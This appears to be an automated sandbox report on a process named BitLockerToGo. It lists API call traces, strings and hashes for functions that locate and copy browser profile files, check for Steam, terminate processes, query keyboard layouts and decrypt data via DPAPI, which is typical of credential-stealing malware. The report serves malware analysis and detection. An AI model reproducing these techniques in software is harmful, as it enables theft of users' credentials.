                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: prefs.js
                                                                                                                                                                                                                                                                                                                    • API String ID: 893096357-3783873740
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c292f12c5044569e1b0e1dddb6ecb2382facbb8334cbeb5948beefd026588a00
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 83adedd2cd826eed93ccdff12ca119a515633878245e1e09fa9b7edb65c27b10
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c292f12c5044569e1b0e1dddb6ecb2382facbb8334cbeb5948beefd026588a00
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3A1D63290016C9BCB60FB39DC46ADDB774FF45311F4105A1AA08F7252DA71AF9A8F92
                                                                                                                                                                                                                                                                                                                    Function 008EC528 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,009185EC,009178BB,?,?,?), ref: 008EC5A0
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185F0), ref: 008EC5C1
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185F4), ref: 008EC5DB
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,009185F8,?,009178BF), ref: 008EC668
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EC6C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008EBB2E: CopyFileA.KERNEL32(?,?,00000001), ref: 008EBBD3
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 008EC834
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008EC848
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3801961486-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e476dabd35e8cdf3d546939b9d46e00fbeeb4845c9ade9fd1f97dfb6a2b468fa
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d4d6c426769655af31a7ffbd2a53decd0da02bd6dbf83508b62747f3ffde987b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e476dabd35e8cdf3d546939b9d46e00fbeeb4845c9ade9fd1f97dfb6a2b468fa
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E81FC3190016DABCB20FB39DD46AD97778FB49314F4105A1ED48E3251EB30AF9A8E92
                                                                                                                                                                                                                                                                                                                    Function 008F42EE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 008F42F8
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008F431A
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F432A
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008F433C
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 008F434E
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F4367
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                    • String ID: steam.exe
                                                                                                                                                                                                                                                                                                                    • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 822e78a9c39ba405d27811910520e5fd51fb459ff1f190e77238ca762c7ad55d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 69ef7a07bdfe34f12ed5f9407ac639a1e949588e35983856a318763c7bed4cbe
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 822e78a9c39ba405d27811910520e5fd51fb459ff1f190e77238ca762c7ad55d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E901DA70A0122DABDB70DB64CC49FEEB6B8BF45341F104196A609E3250EB348B828F50
                                                                                                                                                                                                                                                                                                                    Function 008F4452 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 008F447E
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F448E
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,?), ref: 008F44A7
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008F44BA
                                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 008F44C9
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F44D0
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008F44DE
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F44E9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 577b7939ae62908a120aea6b42a5f7884f86ac7714253069c042853fed3f0aca
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 523f25c807f173cb7b57ce0270f728acdc8eeb932ee5887b168f3725bf33977d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 577b7939ae62908a120aea6b42a5f7884f86ac7714253069c042853fed3f0aca
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3114831A01218ABEB219F64DC48FEF7BB8FB09741F004096FA05F3150DB709A52CB65
                                                                                                                                                                                                                                                                                                                    Function 008F2A37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00917812,?,?), ref: 008F2A68
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008F2A76
                                                                                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008F2A84
                                                                                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 008F2AB3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 008F2B5B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0e11371fab127844f98cc800f0980410101e08540c056f0d1995ae2d8c83c24e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5806d09b69fae181d2a50d2824554a8656f99efe2307921022a3156d82fcd213
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e11371fab127844f98cc800f0980410101e08540c056f0d1995ae2d8c83c24e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E31EE7190022CABDB20AF64DC89BADB7B8FB04301F5045E5BA19F7152DA746F85CF51
                                                                                                                                                                                                                                                                                                                    Function 008F33B3 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 008F33BA
                                                                                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(00914220,00000000,00000001,0091C180,?), ref: 008F33DD
                                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 008F33EA
                                                                                                                                                                                                                                                                                                                    • _wtoi64.MSVCRT ref: 008F341D
                                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 008F3436
                                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 008F343D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 181426013-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e69d07989c86203c6142c77698ec9152b1816d155e79eac4b720301bdca36dda
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3e1c5dc1a0c80ea9b65d3315b16c0ee91c0fc0cc759c6a72fa99d873ec405e63
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e69d07989c86203c6142c77698ec9152b1816d155e79eac4b720301bdca36dda
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80117C70E0824AEFCB01DFA4C8889EEBBB6FF99300F548468F215E7251CB714985DB65
                                                                                                                                                                                                                                                                                                                    Function 008E92A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,008E9456), ref: 008E92C9
                                                                                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,008E9456,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E92DD
                                                                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,008E9456,?,008EDC56,?,?,?,?,?,?), ref: 008E9302
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                                                    • String ID: DPAPI
                                                                                                                                                                                                                                                                                                                    • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ca4dafca64c1baab027c57b86950d34e8be0ba7704e29f4c2f19e30eecfa0ab
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c07473d81d4f1b997b01c1e6b765e7d73e15b618532fa02fa3514249bda49f7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ca4dafca64c1baab027c57b86950d34e8be0ba7704e29f4c2f19e30eecfa0ab
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01E8B6A01218FFCB14DFA8D9848AEBBB9FB48710B104065EA05F7300D7709E41CB90
                                                                                                                                                                                                                                                                                                                    Function 008F3101 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00917817,?,?), ref: 008F3130
                                                                                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 008F3140
                                                                                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008F319E
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 008F31A9
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
